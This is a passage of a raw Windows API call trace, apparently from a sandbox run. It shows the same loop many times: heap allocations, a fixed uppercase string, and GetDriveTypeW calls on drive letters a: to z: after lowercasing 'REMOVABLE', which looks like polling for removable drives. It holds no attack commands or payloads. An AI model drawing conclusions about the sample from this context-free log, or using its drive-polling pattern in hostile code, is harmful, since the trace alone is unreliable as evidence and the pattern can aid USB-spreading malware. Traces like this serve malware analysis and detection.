hHeap=0x12c0000) returned 1 [0213.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0213.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0213.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.233] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.233] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0213.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0213.233] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0213.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0213.234] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.234] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0213.234] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0213.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0213.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0213.234] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0213.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0213.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0213.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0213.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0213.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0213.235] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.235] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.235] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.236] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.236] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.236] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.236] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.236] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.236] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.237] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.237] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.237] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.237] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.237] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.238] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.238] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.238] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.238] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.238] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.238] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.239] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.239] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.239] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.239] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.240] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.240] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.240] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0213.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0213.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0213.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0213.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0213.241] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.241] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.241] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.241] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0213.241] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.241] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0213.241] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260e0 [0213.241] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0213.241] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0213.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260e0 | out: hHeap=0x12c0000) returned 1 [0213.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0213.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0213.241] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0213.241] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0213.241] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0213.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0213.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0213.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.242] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0213.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.242] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0213.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0213.242] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0213.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0213.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0213.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.243] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0213.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0213.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0213.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0213.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0213.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0213.243] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.243] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.244] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.244] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.244] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.244] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.244] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.244] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.245] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.245] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.245] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.245] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.245] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.246] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.246] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.246] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.246] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.247] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.247] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.247] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.247] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.247] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.247] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.248] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.248] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.248] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.248] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.248] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0213.248] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0213.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0213.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0213.249] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.249] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.249] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0213.249] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.249] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.249] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.249] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0213.249] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.249] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0213.249] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0213.249] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.249] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0213.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0213.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0213.249] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0213.250] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0213.250] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0213.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0213.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.250] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0213.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0213.250] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0213.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318de0 [0213.250] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318de0 | out: hHeap=0x12c0000) returned 1 [0213.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0213.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0213.251] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0213.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0213.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0213.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0213.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0213.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0213.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0213.251] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.251] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.251] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.252] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.252] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.252] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.252] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.252] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.252] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.253] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.253] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.253] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.253] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.254] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.254] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.254] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.254] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.255] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.255] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.255] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.255] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.255] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.256] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.256] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.256] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.256] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.256] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0213.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0213.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0213.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0213.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0213.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.257] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0213.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326040 [0213.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326040 | out: hHeap=0x12c0000) returned 1 [0213.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0213.258] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0213.258] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0213.258] HeapFree (in: hHeap=0x12c0000, 